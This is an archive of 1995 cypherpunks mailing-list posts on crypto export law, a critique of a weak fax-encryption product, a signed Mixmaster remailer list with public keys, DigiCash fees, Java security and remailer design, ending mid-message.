> > I always understood there were NO restrictions on crypto export,
> > import or use to western countries.  There used to be COCOM agreements
> > which said that you should get approval to send commercially produced
> > crypto to some blacklisted countries (Iraq, etc).  I also read that
> > the COCOM restrictions did not claim to apply to free software.
> 
> I think that it was the COCOM restrictions that I was thinking
> about. The blacklist was fairly large (including the USSR) and I
> believe that it did apply to software (although I do not know about
> free software).

Hadn't seen the blacklist.  USSR now has it's own blanket crypto ban,
a translation of the Russian text of the presidential decree was
posted by someone a while back.

> > Anyway, I read that the COCOM agreement has expired, so none of this
> > applies anymore, even.
> 
> Now this I did not know. Do you know when it expired and why it was
> not renued?  We must still have some export restrictions for
> Munitions does this no-longer cover crypo?

Sorry, that one was I think got from reading USENET, or at least I no
longer recall where I read it, so I can't vouch for the accuracy of
that.  (I should have disclaimed that).  Perhaps someone else knows
enough to refute, or validate that.

But I was reading about the COCOM restrictions this morning on
Bert-Jaap Koops crypto law survey page:

http://www.kub.nl:2080/FRW/CRI/projects/bjk/lawsurvy.htm

and it says this about COCOM:

> COCOM [1, 5]
> 
> 1. COCOM (Coordinating Committee for Multilateral Export Controls) is
> an international organization for the mutual control of the export of
> strategic products and technical data from country members to
> proscribed destinations. It maintains, among others, the International
> Industrial List and the International Munitions List. In 1991, COCOM
> has decided to allow export of mass-market cryptographic software
> (including public domain software). Some member countries of COCOM
> follow its regulations, but others, such as Germany and the United
> States, maintain separate regulations.
> 
> Its 17 members are Australia, Belgium, Canada, Denmark, France,
> Germany, Greece, Italy, Japan, Luxemburg, The Netherlands, Norway,
> Portugal, Spain, Turkey, United Kingdom and the United
> States. Cooperating members include Austria, Finland, Hungary,
> Ireland, New Zealand, Poland, Singapore, Slovakia, South Korea,
> Sweden, Switzerland, and Taiwan.

This phrase, if accurate, says it all:

> In 1991, COCOM has decided to allow export of mass-market
> cryptographic software (including public domain software).

> > > However our Government seems to take the view that putting crypto
> > > software on the net is not exporting it, the exporting is done
> > > whenever anyone from an export restricted country downloads the
> > > software and is done by them rather than by the person who made the
> > > software available.
> 
> > I also have heard this.
>
> I can not remember where I heard this though. I don't suppose you
> know whether this was an official policy statement or just a comment
> like 'well it may technically be illegal but we would hold the
> downloader liable rather than the supplier'?

I'm not sure if it's unofficial policy or law.  One place I remember
reading this was in one of the crypto groups, Paul Leyland expressed
this view in a recent post to one of the crypto groups.  This was to
do with potential "export" from ftp.ox.ac.uk, which he has something
to do with, and which contains copies of PGP (as well as nautilus,
pgpfone, various encrypting file systems, etc).

Here's my list of relevant sites, with info on EU crypto laws:

http://www.privacy.org/pi/
ftp://ftp.cl.cam.ac.uk/users/rja14/queensland.ps.Z
http://web.cnam.fr/Network/Crypto/survey.html
ftp://ftp.wimsey.com/pub/crypto/Doc/laws/laws-for.ps.gz
http://www.kub.nl:2080/FRW/CRI/projects/bjk/lawsurvy.htm
ftp://ftp.uni-stuttgart.de/pub/doc/security/crypto/euro-clipper.ps.gz

I have been trying to maintain a list of them on:

	http://www.obscura.com/~shirt/

for political background for the munitions T-shirt, in the hope that
some people who browse it will read it and come away more aware than
they were before.  The main thing which worries me at the moment is
the implications of the eu-clipper: the secret service agencies of EU
countries have been plotting this for a while now, and probably have a
clipper like attempt on their agenda.  Ross Anderson reported that
there had been a secret meeting of secret service organisations
earlier this year, to discuss 

Ross Anderson <rja14@cl.cam.ac.uk> wrote (forwarded by somebody, but
originally in one or more of the crypto groups):
> [...]
> While at the conference, 

[the elided text indicated that the conference referred to was "the
Cryptography Policy and Algorithms Conference, Queensland University
of Technology"]

> I found out that a classified meeting took place this March in
> Germany between the signals intelligence agencies of the developed
> countries, plus Australia and South Africa, at which the assembled
> spooks agreed to press their governments to bring in escrow and/or
> weak crypto.

This comment was some time before the latest EU-clipper goings on were
announced.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Koning               1695 <pkoning@chipcom.com>
Date: Tue, 24 Oct 95 09:36:24 PDT
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: Re: Reformated: How secure....
Message-ID: <308D3F77@mailer2>
MIME-Version: 1.0
Content-Type: text/plain



(Re Steve O's Privasoft followup)

Your reply didn't really answer all the questions that have been raised.

You mention a 2 digit key extension, so does that mean the key is 11 digits?
If not, how is a key extension different from a key?

Given that the program is exportable, why is it any stronger than any other
exportable system?

Re how you would recognize readable text: if the scramble is good, the
output would tend to look like white noise.  An invalid decrypt would have 
the
same general look.  But a valid one would have the properties of a normal
fax, which is long run lengths.  So if you do a run length check on the 
data,
you could readily distinguish a valid decrypt from an invalid one.

Incidentally, I looked at the sample encrypted document on the web.  It has
an amazing amount of structure in it, and certainly doesn't look at all like 
the
white noise I expected.  That in itself suggests a weakness.  (Notice the
dashed lines running down the page, 7 of them...)

Also, you forgot to address the known plaintext attack.  If I have both 
plaintext
and cyphertext, then recognition of the correct decryption is no longer an
issue (it's simply a compare).  For the system to be valid by modern 
standards
it has to be secure against a known plaintext attack, and preferably against
a chosen plaintext attack.  (In other words, if I get you to fax an image of 
my
choosing I should still not be able to recover the key.)  It doesn't appear 
that
it is secure in that sense.

Finally, the property you mention of being able to cope with damaged images
doesn't sound at all unique.  You would fail to have this property if you 
use
a block cypher with long blocks, a cypher with error propagation (e.g. CBC
mode in DES), or any cypher applied to the compressed form of the fax.
But any stream cypher or transposition cypher (as I gather you use) applied
against the raw bitmap has this property, since any flaws in the encrypted
image would simply become noise in the plaintext image.  (A black line
would become a gray line in a stream cypher; in a transposition cypher it
becomes pixel dust on the page.)

     paul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Tue, 24 Oct 95 10:49:37 PDT
To: Mixmaster Mailing List <cypherpunks@toad.com
Subject: Weekly Type-II Remailer List
Message-ID: <Pine.BSD.3.91.951024122535.701A-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

ED: You might notice that gondolin has retired. (Sigh!)

type2.list

vishnu mixmaster@vishnu.alias.net bb460f08811a98682def423d30852d11 2.0
spook remailer@valhalla.phoenix.net ca8c8679f7b1cbdcff46d780fba97673 2.0
flame remailer@flame.alias.net 64bbf500097b541a8ddcb2dd80373238 2.0b11
anon mixmaster@anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b
secrets secret@secret.alias.net bc2e4251dbddfa74dfae8b274904c2be 2.0.2b
wmono wmono@valhalla.phoenix.net f68e6add16880b60eb48a4a4330e2e36 2.0.1
mix mixmaster@obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1
knight mixmaster@aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33 2.0
robomix robo@c2.org 3d523f1fd30b5a1c57214960a00f1c4e 2.0b11
syrinx syrinx@c2.org 6c4e7372e84d7092e0d0e69c20d5be46 2.0b11
rebma mixer@rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11
replay remailer@replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11
hacktic remailer@utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222 2.0b11
crynwr remailer@crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11
q q@c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1
Armadillo remailer@armadillo.com 7251877ae6fed509ebf7567715974d1b 2.0.1

pubring.mix

mix mixmaster@obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1

- -----Begin Mix Key-----
db91418edac3a4d7329feaee0b79c74f
258
AATL25WGQY5CMM0/xBjYtuN6IT75h+aBQwwKqZZc
isOrqdsl8HWAzARrB0iAtcr34c2qqPBzSRNa5UE8
d3jOYu/wp9K9M5abUSRogcDl7gkPlqxc+e72SdKd
2Gdgib8VDGVLpJdaPk4uSY/pkmsYB30OaQH3W8dU
PPciTvSJKAYcTQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

vishnu mixmaster@vishnu.alias.net bb460f08811a98682def423d30852d11 2.0b11

- -----Begin Mix Key-----
bb460f08811a98682def423d30852d11
258
AAShg2h4xGHueryUFNsFBbtSGZBcj+oDImFMkOZA
EQPcbeG6ReEnTnoQ8HBgwtx9isMT9hZ93lBaRY07
ygupHQRi6f+FnlQEZTKqOe+8E+WyDx+ox/1ywgt+
KGFOW+t8WRXA/loKuqD0KH4pwpe7FYE0arGbtm4J
EscGM2DE3TeS3QAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

knight mixmaster@aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33 2.0

- -----Begin Mix Key-----
6bb0d89a29fd188c67b8e04516b5af33
258
AATOSyg7N2PVg9VgA8voDWglq6ESNBLqH0heB2iE
NfvmR/VnyAHCb4ZBtHzvM7ZRBdXYmH/Jt490wg6O
ZCbhcIceFKSsibLEH77+111isAhUbHvn0Nh9gOI7
5ngjOGDQaLQvGUbNHRXQaPAZ0rc4lv9gmChJONOJ
7sFC2J96QR4aewAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

robomix robo@c2.org 3d523f1fd30b5a1c57214960a00f1c4e 2.0b11

- -----Begin Mix Key-----
3d523f1fd30b5a1c57214960a00f1c4e
258
AATQ2zxiRZ5bQuNBKHEvg11R7L69Hc9ZrjTon3o3
s7fbXmuEaiym48sHoRLAttZ3ADuH1FgbuYt1DF+L
Il9Yp5U9znm9MX0rS8xq1iGg7YDED/3x6OWIp7za
17+pWnYmEF+Rz6YZ2o/67ujcBfrJ/odz+SVlaGqF
rWWjaG/oWdqWWwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

syrinx syrinx@c2.org 6c4e7372e84d7092e0d0e69c20d5be46 2.0b11

- -----Begin Mix Key-----
6c4e7372e84d7092e0d0e69c20d5be46
258
AATKhnhAIHXRCKZAi2tehJfQ9s+IsVPjEQQk5xwQ
60VXzmgkC2YirmDFeLz1feNgCMd78GkKHYK5p9WM
HBkPNTDPLraJhJLNDHeHqGtqAI4BTHq/lZ/RMyOH
GV/X5TaUEG69IGb2Rl8OnzNWF9fhKwH6PTE+QiQX
kIcxJnVW+yYOpwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

rebma mixer@rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11

- -----Begin Mix Key-----
e7d84921298b0aadaf8f050d145ccf03
258
AASjOGqzTLdjweTMiwirrpVNqXj/ODJVyh9pEo5i
q5ERILOd1hMNKY9XLNFYM30mUR/Fkh0MnYI/ujWz
OTb0rR2a31nvmaLMdaB75nTdGJwHitCmo8k2eTjL
XQsXV6zKrzXGp8H8NO34DAFWJy1qVcev+6lLAWGy
j/fsJJyJNtl94wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

replay remailer@replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11

- -----Begin Mix Key-----
e3e2b4d67314b6165ee03b0b0ae07a7f
258
AATZBfJhv+DGg4OEfQfgVnzZZpumEZHI9CES+Ux2
dBp9RBPpJnAtLpcAyCIkNjSaik0togcKhFgcR3nt
XIrWclJ/uO/Z1fqW7ESLwzXozCpqnG5S/y6mUPuL
yzA9bqtAGd+pvxuK/Cw2Zzx+1QGp0VtWb46KxqvC
S4POHYFljkrQiQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

hacktic remailer@utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222 2.0b11

- -----Begin Mix Key-----
bf61835a7b3cfa59c409caeab4e8a222
258
AATkwgy72zwwavCHn1OytNMsBYAIBnCFa2hcbZPi
IN6eS4jDgFdld5DlcqqzdN6Lxv96i0Dg7ElFyAFR
5zmof3oaNqh5vbq/fTEbvFtX9EGyuqkfN6fKoAEv
G7gtmkfosoIg/jnI8AL9KC/J5mGaxrWYB6XBe+v9
iI1pOSbPsDCsdQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

crynwr remailer@crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11

- -----Begin Mix Key-----
64c62de6b347b3050fbb6e94c649112d
258
AATLe0CWPSn844FCeL7FzUlf+vE2qfYBPs/8PYYm
BfITjknJjD0dk7vXhX9Qc5PFgDWRHhVoIRlFT3sc
Jp2UVFLOZ5zn/WiT9Wa1tZsqejDf3MRIDT/K6cHB
uB/SUaxLzNfk/wG1uBTUHukdjwCyDxNLHuYA5mVz
opYJhQR0Nc/ESQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

spook remailer@valhalla.phoenix.net ca8c8679f7b1cbdcff46d780fba97673 2.0

- -----Begin Mix Key-----
ca8c8679f7b1cbdcff46d780fba97673
258
AATZXVb4yP3MGt/ZCR5FtrHPMgYNyXHBmnG8KWO0
UaT5jbMqBdRQEzOVrCN/5RXerpS8Hctbc5MrwhSr
fh/byQLwLkY50zYAxWSRBpaAJgZtCnQtVTgmt9yu
BDiCE2OasFnZlwsi+9t8+c5R2bS3C6UhjQsgybbF
Aw7xWK3v3fPJqQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

flame remailer@flame.alias.net 64bbf500097b541a8ddcb2dd80373238 2.0b11

- -----Begin Mix Key-----
64bbf500097b541a8ddcb2dd80373238
258
AAS5NFs7yPSFv+WwpO26/2OS7CYJDtrhlrEasf8S
jJ9P0jqWXuorDIMKT3YfvSkk2xKqAHiHrOFEqltY
plIUCoXyAf/7CmNyPYdTN6xNxO74ZIsTQnNgAJT3
6a8+JL92DZJM6pYfhpSvPq7lj5X0h6Hj/oCAlqiS
31TZJkd2jenjDQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

q q@c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1

- -----Begin Mix Key-----
c44e1cb0f0709465c21b07ac972bf973
258
AATDBaiKBy4jPlRUIQmVvcjO/GhWLbsls+mKloml
5EScYl+3fGw04P4xVcWOSledFVxKVfNy+xTVI8pE
XGXSr0cRUIa1NttzNPk/KObb5SvkeqGtWAyRiWBS
G91MkWM6LbqzKPcu6gUON47wJCJCzdvgbUIeVJIT
MnyBvMWJX5CKAwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

Armadillo remailer@armadillo.com 7251877ae6fed509ebf7567715974d1b 2.0.1

- -----Begin Mix Key-----
7251877ae6fed509ebf7567715974d1b
258
AASWRIpH97WDVCNc/kiLqvmxqwN9cAAbZFi+FIwr
gCixQRTtD/SXuXd62iIqRMp3xm4c+uSnTzLijIxi
fCYLacNMVeh0PXAszfFIh6CBicPq1UWt82Wu5dqw
K/goNULqNDUypGQtOfOpHSQKPwAphXplKhv75OZs
SjtMoEcv0CCk3wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

secrets secret@secret.alias.net bc2e4251dbddfa74dfae8b274904c2be 2.0.2b

- -----Begin Mix Key-----
bc2e4251dbddfa74dfae8b274904c2be
258
AATBBbpmFw7omad8hpvxQiylmoi5MBXs5SivpcY6
65jnhZIiL9HvTE+Rq+30STccDsQWze0/iZthg1RL
tCXYtABwkfsHOf60/aq1aOBobkquzBItvzQMG0W/
TkVinZYUTqfdytl/pfLDIQiXv7Z0t98MrLsmVopE
1NQS7sH6g9srFwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

anon mixmaster@anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b

- -----Begin Mix Key-----
e3ca4cc5beb9934ae6d52dd27da80332
258
AATZuNYrX4bw6A01PA00qMr7KeJsnHIq9wYoSc5P
OrHUEvPUoCxmLfuhwF9eEfSkV4t9DLPIMhKXM4iL
Afhv2IZKeWaA98q4NHb6E7Gg6/e6uCI1O3nmXXK8
la4ij9RneCHig5K6JlCh3MJTkuW/IEYQjMrz2/H5
RUDEwx+/HL5K0QAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

wmono wmono@valhalla.phoenix.net f68e6add16880b60eb48a4a4330e2e36 2.0.1

- -----Begin Mix Key-----
f68e6add16880b60eb48a4a4330e2e36
258
AASe+l+eIE1GYugbIPDG87h9wIFD0KqLWrMiN0PN
RBCmRwsHOu1mZDnJTPlg7RXI17+DJMkk+huGPTuA
T+KilAv8WFKWmvHuOpIBwxVBMXFKHsrQYHES63t0
UMQvRCv9LXZZvmiBWKrZp5vQaSOZKYLf4v3pQw7U
SsbB5geSP9fQ2wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG@WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp, a Pine/PGP interface.

iQEVAwUBMI0i8qghiWHnUu4JAQFyRgf8CRcpz+KPl84PGWpZGG5X0gdsjheBdV+f
Kk3RJzj48tadeeV3AGXy1u+W+S8W+BRjAqu52TGD97i38N9CemltHYn+zU+M7tNN
MY/gV7TGBqhOsCs7jOxH9XovyI59DI9rDVft6FIrHLBlSYsM73v6wApXAwEmVhXl
WgPMJotkQZOmekMvo4Z2qGJMqMpB5tgzIHqOB+i/Y1w65bG+31KqYiaudr2nGxuX
KV09GwGk4993eYIoZIQLCEBAyxI+j5/tymQEk7hc6veaZG4FkuBo5cp6OnFiexTD
JrDE8g5Cx/JAGRa5FST9faQb8cjIUqOov8YPrcOcF7/54e+bIUmLcQ==
=3CrR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 24 Oct 95 12:45:44 PDT
To: cypherpunks@toad.com
Subject: Re: Hack DigiCash: Payee Anonymity
In-Reply-To: <199510240750.IAA04175@utopia.hacktic.nl>
Message-ID: <199510241944.MAA00667@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


nobody@replay.com (Name Withheld by Request) writes:

>Now all we need is to do is get some specs on how DigiCash's software works
>so that we can code this.  I expect that this method will become quite
>popular.  To withdraw DigiCash, one must come up with $250 to start, sign a
>bunch of forms, etc.  I suspect that most people would rather change money
>in lesser amounts, probably under $50.  This opens up a huge market for
>Blacknet money exchangers.  I would gladly pay Tim's Internet Cash Exchange
>a commission to exchange $50 worth of greenbacks for Digicash instead of
>dealing with Mark Twain and shelling out $250 to start..

I don't believe this $250 is correct.  The only place I see such a number
is on the application form, in the following clause:

"A maintenance fee of the foreign equivalent of $10 will be imposed each
statement period if the balance in your account falls below the foreign
equivalent of $250 on any day of the period."

This is for a "WorldCurrency Access Interest Account", which I don't
think is what is used for ecash.  For ecash the account opening fee is
$11 and the per-month fee is $5.  I don't see any reference to required
account minimums.

As far as the issue of coding up a payee-blinding cash system compatible
with this ecash, I agree that it would be good to see some specs now that
ecash is for real.  IMO Chaum has been getting a free ride based on his
reputation, with many people assuming that anything he is associated
with must be done right.  It is time for him to open his hand and reveal
his protocols so that people know exactly what they are trusting their
money to.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Tue, 24 Oct 95 09:59:34 PDT
To: tcmay@got.net
Subject: Re: Crypto's Role in Evil?
In-Reply-To: <199510100354.UAA10505@comsec.com>
Message-ID: <9510241652.AA10785@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Mon, 9 Oct 1995 11:20:41 -0700

I'm late getting to my mail backlog.

>From: tcmay@got.net (Timothy C. May)


>It's clear that cops cannot protect people, only try to catch the perpetrators.

I heard a particularly scary quote from Director Freeh last Sunday on NPR's
Weekend Edition (I believe that was the show -- segment A-1) in which he
declared "our job is to protect the people".

If that were the FBI's job, then we'd have to look at it as one does to a
loving parent and give it all the authority and respect a child gives a
parent.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme		   |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+---------------------------------------------- Jean Ellison (aka Mother) -+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
Date: Tue, 24 Oct 95 12:54:37 PDT
To: daw@lagos.CS.Berkeley.EDU (David A Wagner)
Subject: Re: Sun speaks out - but not to the cypherpunks
Message-ID: <v02110104acb2f2b8513a@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


>-----BEGIN PGP SIGNED MESSAGE-----
>
>In article <v02110101acaf51651ef9@[204.156.156.4]>,
>Todd Glassey <todd@lgt.com> wrote:
>[ lines marked > > are from fc@all.net (Dr. Frederick B. Cohen) ]
>> Pardon the flame but I really have just about heard enough of this BS...
>[...]
>> >> The area where we can (must) build trust is the computing base.
>> >> Traditionally, this has been the OS, but in the case of java, it is
>> >> the java interpreter (such as netscape 2.0 and hotjava).  The browser
>> >>  is now the TCB (trusted computer base) for all practical purposes...
>> >
>> >Read: The Java interpreter is supposed to be a TCB.
>[...]
>> >Who here truly believes that the implementations of Java meet the
>> >requirements of a TCB?
>[...]
>> Dr. Fred, you seem to spend a lot of engery slamming Java and HotJava.
>[ ... flame deleted ... ]
>
>
>No, here I think Dr. Cohen's comments are right on the mark.
>
>The Java interpreter *is* supposed to be a trusted computing base.
>Do we have any reason to believe that this trust is well-placed?
>
>(If you don't agree, go through the Orange Book evaluation criteria,
>and pay special attention to the assurance sections...)
>- ---
>[This message has been signed by an auto-signing service.  A valid signature
>means only that it has been received at the address corresponding to the
>signature and forwarded.]
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>Comment: Gratis auto-signing service
>
>iQBFAwUBMIwG2CoZzwIn1bdtAQEpowGAgHiyk0tTQk5SO/3TR5EZRMFmUy/TjQmu
>NbYIt0R/Tf0g9xWbolm5XN0alu947uJs
>=UZH0
>-----END PGP SIGNATURE-----


Sorry abopt the above flame-war I caused.

My point was almost benign in and of itself. Yes, the Java concept is
sound, No, the currently available implementation has some real
architectural considerations that must be addressed in order that we can
build a stable and secure platform atop it.

My real issue is that there is so much time spent on this list knocking the
individual spokes that make up this wheel we call Electronic Commerce, that
it is more and more costly to filter out the technology from the background
noise. Still because of the value of that technology, I and others are
forced to spend precious hours reviewing all that comes across our desks.

Bluntly being an active member of several Security and Payment Mechanism
working groups I view some 150+ pieces of email a day and sometimes get
frustrated by the amount of noise, or the roar in the background, about
what are to the largest percentage of us, meaningless dribble... Still
there is the occaisional golden nugget that makes it all worth while..

Again My apologies to have stirred up this mess. I will retreat under my
desktop from the mele' that seems to be unending.

Todd




Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd@lgt.com

(415) 324-4318


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQB1AwUBMFu5E6gNRnWhagU5AQHI+gL+Mwpcd3lAWd8FF06qcG6rnLhIYveHW71a
XC7xh1T0uu8qnYX31yMp17OG28jWpKUbWec1IM9/eXOi+gInA7rKICWczV8zo9Z0
0puxjRRN7yO4KfRb3cPpk+r0p6pDg01Y
=bTYb
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Tue, 24 Oct 95 10:59:53 PDT
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Don't Kill the Messenger--A New Slant on Remailers
In-Reply-To: <199510241203.IAA22014@homeport.org>
Message-ID: <199510241759.NAA01689@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack writes:
>	Who cares if you can read messages encrypted to the key or
>not?  Let everyone connect and download whatever messages they want to
>see.  They're encrypted, after all.

Two reasons.  One, it cuts down on traffic.  Why bother to waste the
server's bandwidth on something the client can't read anyway.  The only
possible reason someone could be asking for the data is because they're
trying to compromise the key or do traffic analysis.  Why help bad
guys?

Second, there's no reason the messages need to be encrypted.  The
server can accept messages addressed to *any* string of eight hex
digits, and doesn't care about the content.  The server needn't limit
the kinds of encryption used in the actual message.  It only cares that
the recipient is "really" (in some sense) the right reciever.

The original mental prompt for the idea came from the discussion of
the "key-is-the-person" model.  I was trying to devise a scenario where
it was possible to know of an entity only through his key, and came up
with this.  I also included the idea that messages signed by the key
would be forwarded by the server after being pseudonymized to the
keyid.  That way, the user could participate in mailing lists purely
identified by the key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 24 Oct 95 13:12:24 PDT
To: fc@all.net
Subject: MD5 concerns, was Re: Netscape Logic Bomb detailed by IETF
Message-ID: <9510242008.AA07416@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> channel.  I think that Netscape uses an MD5 checksum which the members
> of this list seem to place unlimited trust in (incorrectly in my view,

